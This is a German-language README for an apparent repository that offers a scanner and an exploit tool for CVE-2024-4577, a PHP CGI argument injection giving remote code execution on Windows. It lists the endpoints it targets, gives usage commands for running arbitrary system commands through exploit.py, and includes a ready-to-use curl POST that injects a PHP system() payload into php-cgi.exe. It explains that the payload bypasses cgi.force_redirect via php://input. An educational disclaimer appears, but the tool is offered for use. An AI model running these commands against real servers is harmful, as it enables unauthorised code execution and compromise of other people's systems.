
Scanner und Exploit-Tool für CVE-2024-4577, eine PHP CGI-Argumentinjektions-Schwachstelle, die Remote Code Execution auf Windows-Systemen ermöglicht. Enthält Erkennungs- und Befehlsausführungsmodule.
CVE-2024-4577 ist eine kritische PHP CGI-Argument-Injektions-Schwachstelle, die Windows-Systeme betrifft, die PHP im CGI-Modus ausführen. Diese Schwachstelle ermöglicht es entfernten Angreifern, über speziell präparierte URLs Argumente in die PHP-Kommandozeile einzuschleusen, was zu entfernter Codeausführung (RCE) führt.
Dieses Repository enthält:
CVE-2024-4577.py: Ein Scanner zur Erkennung verwundbarer Ziele.exploit.py: Ein Exploit-Tool, das PHP-Code sendet und Systembefehle auf dem verwundbaren Server ausführt.⚠️ HAFTUNGSAUSSCHLUSS
Dieses Projekt dient ausschließlich zu Bildungs- und autorisierten Testzwecken. Jeglicher Missbrauch dieses Codes liegt nicht in der Verantwortung des Autors. Verwenden Sie es verantwortungsbewusst und nur in Umgebungen, die Ihnen gehören oder für die Sie ausdrücklich eine Testgenehmigung haben.
requests-BibliothekAbhängigkeiten installieren:
pip install -r requirements.txt
Erkennen, ob ein Ziel für CVE-2024-4577 anfällig ist:
python3 CVE-2024-4577.py -u http://target.com

python3 CVE-2024-4577.py -f urls.txt

python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php
Der Scanner und der Exploit testen gängige CGI-Endpunkte wie:
/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello
Das Payload umgeht cgi.force_redirect und fügt schädliches PHP mittels php://input ein.
Beliebige Systembefehle auf einem verwundbaren Ziel ausführen:
python3 exploit.py -u http://target.com -c "id"

python3 exploit.py -f urls.txt -c "id"

Sie können die Schwachstelle auch manuell mit curl ausnutzen
curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"
Dies sendet ein PHP-Payload, das uname -a auf dem Server ausführt und die Ausgabe zurückgibt.

Dieser Code wird unter der MIT-Lizenz veröffentlicht. Siehe LICENSE für weitere Informationen.